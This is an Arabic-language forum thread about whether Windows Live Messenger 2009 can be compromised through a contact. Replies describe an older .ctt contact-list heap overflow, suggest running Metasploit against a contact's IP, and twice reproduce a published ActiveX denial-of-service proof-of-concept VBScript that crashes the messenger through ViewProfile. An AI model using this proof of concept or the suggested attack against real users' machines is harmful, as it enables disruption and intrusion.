هل توجد ثغره في Windows Live Messenger 2009

[protection]

من له خبره في أختراقات عن طريق الماسن .. بدون وضع رابط صفحه ملغومه وخلافه

ياليت يعطينا الخبر الاكيد

هل توجد ثغرة في الماسنجر الاصدار الجديد 2009 من خلالها يتم أختراق الشخص دون علمه

بمعنى قبلت أضافه لهكر .. وبمجرد مايكون لديك ضمن قائمة الاتصال فهو قادر على أختراق جهازك

دون ان تشعر بسبب هذه الثغره :cr: مهما كان نوع الحمايه لديك .. . .

اذا هذا الكلام صحيح .. ومن لديه ملعومات اخرى .. ياليت يفيدنا

 

[wajdi abu lail]

الثغره كانت موجوده في النسخه التي صدرت قبلها وجميع النسخ اصدار رقم 8
تفاصيل الثغره :
نوع الثغره / Local Heap Overflow
والخطأ في معالجة ملف ctt وهو الملف الذي يحفظ به برنامج الماسنجر قائمة المتصلين Contact List
تفاصيل متقدمة:-
الخطأ البرمجي في طريقه استخدام داله FormatMessageW في مكتبه kernel32
العنوان 0076228A
عندما يستورد الماسنجر قائمه اتصال يقوم بحجز كتله ذاكريه Heap بحجم 4096 بايت
يقوم بعد ذلك بكتابه رساله تطلب من المستخدم تأكيد اضافه الايميل المحدد ضمن الرساله
يظهر عنوان الايميل الالكتروني الذي يستطيع الهكر استغلاله عن طريق هذه الثغره
فهي ثغره أمنية خطيرة تؤدي إلى اختراق الجهاز الذي نستخدمه..
لكن في النسخه الحديثه اصدارات 2009 تم معالجة هذه الرقعه .. واصبح استخدامه آمنا
والله اعلم

 

[simulator]

الثغره كانت موجوده في النسخه التي صدرت قبلها وجميع النسخ اصدار رقم 8
تفاصيل الثغره :
نوع الثغره / local heap overflow
والخطأ في معالجة ملف ctt وهو الملف الذي يحفظ به برنامج الماسنجر قائمة المتصلين contact list
تفاصيل متقدمة:-
الخطأ البرمجي في طريقه استخدام داله formatmessagew في مكتبه kernel32
العنوان 0076228a
عندما يستورد الماسنجر قائمه اتصال يقوم بحجز كتله ذاكريه heap بحجم 4096 بايت
يقوم بعد ذلك بكتابه رساله تطلب من المستخدم تأكيد اضافه الايميل المحدد ضمن الرساله
يظهر عنوان الايميل الالكتروني الذي يستطيع الهكر استغلاله عن طريق هذه الثغره
فهي ثغره أمنية خطيرة تؤدي إلى اختراق الجهاز الذي نستخدمه..
لكن في النسخه الحديثه اصدارات 2009 تم معالجة هذه الرقعه .. واصبح استخدامه آمنا
والله اعلم

بارك الله فيك علي المعلومات

 

[SALEM666]

بارك الله فيكما على التوضيح

 

[Juve GuardJuve Guard is verified member.]

حسب علمي الثغرات كانت اغلبها في الاصدار 2008
وانحلت في الاصدار 2009
وهذي من ضمنهم

 

[عطر الفارس]

امممم ثغره ماعتقد بالاصدار الجديد

بس في عن طريق الايبي

يضيفك ويكون عندك بالقائمة وياخذ الايبي وطرقها كثير

ويفحط على ثغره عشان يستغلها عن طريق برنامج الميتاسبلويت

وهب في جهازك بس هذ الطريقة الفريدة الى الان مع الطرق القديمة

ارسال باتش وصفحات ملغومة وصفحات مزورة

يعني الخوف اذا اضافك واحد شاطر في البرنامج هذا​

 

[format]

السلام عليكم و الرحمه الله وبركاته

كيف حالك ياوليد شكلك دايما عندك مشاكل في المسنجر

مين قال انه مافي ثغره اله

تفضلو وهذا شو

# Title: Windows Live Messenger 2009 ActiveX DoS Vulnerability
# EDB-ID: 11070
# CVE-ID: ()
# OSVDB-ID: ()
# Author: HACKATTACK IT SECURITY GmbH
# Published: 2010-01-08
# Verified: yes
view source
print?
Product:
Windows Live Messenger 2009 (Build 14.0.8089.726)
 
************************************************************************
********
Vulnerability:
ActiveX - Denial of Service
 
************************************************************************
********
Discussion:
Vulnerability is in Activex Control(msgsc.14.0.8089.726.dll)
Sending a string to ViewProfile() , cause a crash on msnmsgr.exe
*must be signed in Msn Messenger account for triggerin the vulnerability.
 
************************************************************************
********
Vulnerable:
Windows Live Messenger 2009 on Windows Vista
Windows Live Messenger 2009 on Windows 7
 
Not Vulnerable:
Windows Live Messenger 2009 on Windows XP
 
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com
 
and
 
Natal Networks Inc.
Vulnerability Discovery, Penetration Testing, IT Security Consulting
www.natalnetworks.com
 
************************************************************************
********
 
Original Advisory
www.hackattack.com
www.natalnetworks.com
 
************************************************************************
********
PoC .wsf script:
'works on vista and windows7
 
<package>
 
<job id='DoneInVBS' debug='false' error='true'>
 
<object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' />
 
<script language='vbscript'>
 
arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
 
target.ViewProfile arg1
 
</script>
 
</job>
 
</package>
 
About HACKATTACK and Natal Networks
================

الثغره نوع PoC و كما هو واضح انها انها لعمل الكراش ,, و هي remote ( عن بعد )


*و طريقه آليه الثغره هي بإرسال package للتحقق من user-supplied data لبرنامج المسنجر

فيفشل برنامج المسنجر من التحقق . كما هو واضح من كود الثغره (target.ViewProfile) . فيستبدل التحقق بمهاجمه البرنامج ,, (كما هو معروف للجميع طبيعه عمل ثغرات الـPoC أو الفيض).

لغه الثغره هي : vbscript و يتم تنفيذها من خلال متصفح الاكسبلورر . كما هو مُبين من الثغره لانها تستعمل

الـActiveX .


هذا و الله تعالى أدرى و أعلم ,,

انا شخصيا لم أجرب الثغره لان المنسجر لا يعمل عندي بالعمل ,, و هذا كودها :

<package>

<job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' />

<script language='vbscript'>

arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

target.ViewProfile arg1

</script>

</job>

</package>

للعلم الخاص شغاله على ويندز 7 وفيستا واكس بي :hh:


ماظل اشئ << :cr:

الله يعينكم :d:
​

 

[إكس زيرو]

س هل جدار الكاسبر يحميني من هذه المشكلة ؟
​

 

[format]

ج لا

 

[نيرة عز]

أخي وليد ريح بالك وإذا لابد فمن الوهمي عند الضروره كما أفعل ثم أنت إن شاء الله المولي يحميك لأنك تكون في عون عباده أتظن أن يجعل مكره يصيبك لا والله إلا إن أراد الله إمتحانك فهذا حكمه ونحن سمعا وطاعه ورضا
اللهم عافني وعافي كل المسلمين والمسلمات والمؤمنين والمؤمنات
إنك أنت الرؤف الرحيم اللطيف

 

[عاشق ومالي حبيب]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي